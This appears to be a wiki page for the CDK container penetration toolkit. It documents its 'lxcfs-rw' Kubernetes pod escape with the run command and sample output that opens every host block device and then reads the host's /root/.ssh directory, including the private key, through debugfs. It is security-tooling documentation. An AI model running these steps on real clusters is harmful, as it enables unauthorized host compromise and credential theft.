Skip to content

Exploit: lxcfs rw

Jump to bottom
neargle edited this page Aug 26, 2021 · 2 revisions

Exploit: K8S & lxcfs Escape

Escape container when root has LXCFS read & write privilege.

当POD挂载了LXCFS目录包含CGOURP目录,并且对CGROUP有写权限。

Usage

./cdk run lxcfs-rw

Example

./cdk run lxcfs-rw

root@lxcfs-rw:/tmp# ./cdk run lxcfs-rw
2021/01/28 09:25:21 found pod devices.allow path: /kubepods/burstable/pod561ee143-4468-443a-9940-f262a9417ae5/ef6edb3c483591aaa28923df6de84d1fedb9372890c4441fd0e31ed4972237b1
2021/01/28 09:25:21 found host blockDeviceId Marjor: 252 Minor: 1
2021/01/28 09:25:21 found rw lxcfs mountpoint: /data/test/lxcfs
2021/01/28 09:25:22 set all block device accessible success.
2021/01/28 09:25:22 devices.allow content: a *:* rwm
2021/01/28 09:25:22 exploit success, run "debugfs -w host_dev".

root@lxcfs-rw:/tmp# debugfs -w host_dev
debugfs 1.44.5 (15-Dec-2018)
debugfs:  ls /root/.ssh
 393231  (12) .    52566  (12) ..    395870  (24) authorized_keys
 395829  (16) config    395860  (20) known_hosts    393227  (16) id_rsa
 395831  (3996) id_rsa.pub
Clone this wiki locally